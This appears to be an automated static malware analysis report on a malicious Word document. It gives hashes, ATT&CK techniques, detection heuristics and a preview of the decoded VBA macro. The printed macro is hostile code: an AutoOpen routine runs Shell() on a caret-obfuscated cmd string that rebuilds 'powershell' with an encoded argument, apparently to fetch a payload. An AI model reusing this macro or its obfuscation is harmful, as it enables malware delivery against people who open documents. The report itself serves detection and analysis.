Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 84186dd72b75a7e8…

MALICIOUS

Office (OLE)

Size: 107.0 KB
Created: 2018-06-07 07:16:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 5f20f20cb9f0d01f9eac5f7432f78ea7
SHA-1: 828eecd255bdf1a9fd158651d64ef02a354f2a93
SHA-256: 84186dd72b75a7e8eb6d0835d42591ea34abe9ea8ff8d3bd5843c74424c9db4c
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers the execution of a Shell() command (through the helper function BjtzaYT). The string passed to Shell() is assembled from concatenated fragments, and its command-line arguments are obfuscated with caret (^) escape characters, a pattern most likely intended to download and execute a secondary payload. The specific command constructed is 'md NVmKNFQo PKzncVkYYGzwO AZPZpTtqBdXj EC kZlj TkoBWomK & %^c^o^m^S^p^E^c^% %^c^', which is highly suspicious.

Heuristics (6)

  • VBA macros detected (severity: medium; 3 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical) [OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro (severity: high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main; channel: In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14663 bytes
SHA-256: 0ad2ec4e3c6765ce0f5bea47a9d361cb26644a97dcb0a2be1b70a6ad029ce2f6

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "vcXuWiwh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BjtzaYT()
On Error Resume Next
iYYOB = Tan(UNlIvt _
* Tan(SJFrPc * Int(aJIZXk * Sqr(23129) / VaDRI + Fix(83627)) / 93076 * Round(54740 / Log(33597 - GbJuD) + 32284 - NdFnB)) _
/ 86886 + Log(16815))
kmYQz = Tan(QiNrKE _
* Tan(lzWhoU * Int(AjfGr * Sqr(22247) / HGTUh + Fix(90295)) / 16412 * Round(45435 / Log(9535 - MRjqz) + 92220 - sMjcf)) _
/ 68796 + Log(11709))
BjtzaYT = miidDu + Shell(azjuJw + Chr(IcVhrsdUFG + vbKeyC + SQtNVnhWQ) + bNwSUIAJnih + hZCBiz + XGXadUoQGsG + zJjrZAiw + cPpOVKz + kTjjOHS, 57000 - 57000)
YAIAH = Tan(YnjJY _
* Tan(XdJVNs * Int(UWoSDn * Sqr(54220) / fbibW + Fix(25369)) / 14610 * Round(17941 / Log(90015 - WzFni) + 99805 - YBfPCO)) _
/ 27653 + Log(75185))
End Function
Sub Autoopen()
On Error Resume Next
lqjhFN = Tan(EtMwiB _
* Tan(PUOVqv * Int(hsomim * Sqr(92679) / cNTnlc + Fix(32679)) / 49720 * Round(25438 / Log(90666 - SAuRB) + 95232 - UQvnt)) _
/ 44993 + Log(84605))
BjtzaYT
Dwuvab = Tan(GQwiuQ _
* Tan(wuBZh * Int(snanoI * Sqr(33866) / DoTwvs + Fix(46646)) / 35756 * Round(60047 / Log(34528 - iktdT) + 44941 - FPRAm)) _
/ 37554 + Log(80478))
End Sub



Attribute VB_Name = "zQYHGSJDC"
Function bNwSUIAJnih()
On Error Resume Next
DikLJD = Tan(WusBqP _
* Tan(UCQVRF * Int(hCjIwi * Sqr(49632) / PzUqS + Fix(95360)) / 98167 * Round(36497 / Log(91229 - jCQjkt) + 40288 - aNTFj)) _
/ 31730 + Log(85785))
QpVREDrQSL = "md " + "NVmKNFQo " + "PKzncVkYYGzwO" + "AZPZpTtqBdXj EC" + "kZlj" + "TkoBWomK &" + "     %^c^o^" + "m^S^p^E^c" + "^%" + "     %^c^o^m"
WjDDN = Tan(Nzish _
* Tan(zvVjVo * Int(CTzSnn * Sqr(67956) / MDJQD + Fix(95475)) / 32139 * Round(52750 / Log(36220 - sTOpR) + 9820 - MUPirj)) _
/ 69177 + Log(89296))
IJkLUhKcbwl = "^S^p^E^c^% " + "    /V   " + "      /" + "c      " + "     set %TsLhJ" + "wV" + "KkwjbUF" + "Z%=TQtWfWoh" + "&&set %oVsss"
phYNQP = Tan(MAwVcd _
* Tan(jUDUd * Int(TNCsb * Sqr(52989) / TdUTZ + Fix(42210)) / 40804 * Round(14883 / Log(67670 - EzcpC) + 77579 - kOiSi)) _
/ 20612 + Log(77695))
ZcJPnNZ = "nQiWK%=p&&set" + " %DWQw" + "niHHEbC%=o^w" + "&&set %OPvPmYtl" + "DJ" + "Zwp"
GZPcf = Tan(mozKif _
* Tan(vGHuzR * Int(VBfQZj * Sqr(15392) / szlSj + Fix(9013)) / 36930 * Round(93566 / Log(11120 - DVSKif) + 37384 - tpHbY)) _
/ 71942 + Log(86616))
lnwkwi = "vN%=cuRm" + "tKO" + "NLfhG&&set" + " %" + "AWiGdpwWc" + "nF%=!%oV"
bNwSUIAJnih = QpVREDrQSL + IJkLUhKcbwl + ZcJPnNZ + lnwkwi
End Function
Function hZCBiz()
On Error Resume Next
tFtwDw = Tan(avzZP _
* Tan(XbJCPt * Int(jLWAzQ * Sqr(75642) / ERbzZ + Fix(81447)) / 21891 * Round(26049 / Log(5722 - bFwrO) + 64284 - DJVNz)) _
/ 47838 + Log(16942))
PoskzHiRnIw = "sssnQiWK%!&&" + "set %vPfzDiT" + "uCG" + "YMEv" + "Y%=fbTYCIt" + "l&&s" + "et %z" + "Twc"
wKijtA = Tan(LFViVZ _
* Tan(IMOHun * Int(zowouu * Sqr(14637) / FGsSH + Fix(55517)) / 61960 * Round(56139 / Log(57767 - GptqV) + 69646 - jNAJw)) _
/ 82580 + Log(57838))
oaZZjkZf = "asSO%=" + "e^r&&set %itVN" + "jnwND" + "iWi%=!%D" + "WQwniHHEbC%" + "!&&set %cGov" + "REAdPijjJ%=s&&" + "se" + "t %ECoEAhDH" + "qnpnicu%="
DzVlu = Tan(GftzPl _
* Tan(RNcjk * Int(owuISM * Sqr(55878) / jHIHP + Fix(28177)) / 95334 * Round(8562 / Log(59991 - rjKzK) + 54 - GwIPAX)) _
/ 50199 + Log(27791))
suTvf = "cTiWWFhz" + "&&set %" + "QzjWFfDjt%=h" + "e&&set %" + "MuZ" + "tK" + "qpEvmb" + "P%=ll&&!%" + "AWiGdpwWcnF%!" + "!%itVNjnwNDiWi"
pWIpCZ = Tan(maXls _
* Tan(WFNhSr * Int(noouR * Sqr(24034) / Uwjki + Fix(85916)) / 42493 * Round(47902 / Log(51138 - pHSRYZ) + 73867 - wGbDB)) _
/ 35205 + Log(9850))
UJfqalj = "%!!%zTwcasS" + "O%!!%cGov" + "RE" + "AdPijjJ%!" + "!%QzjWFfD" + "jt%!!%" + "MuZtKqpEvmbP%! " + " -e KAAgAG4AZ" + "QBXAC0"
NGBiNX = Tan(LznunC _
* Tan(dwiRs * Int(ZjPPB * Sqr(61220) / GmQwN + Fix(59786)) / 99893 * Round(60157 / Log(30503 - riSRG) + 38547 - fzMzcd)) _
/ 47832 
... (truncated)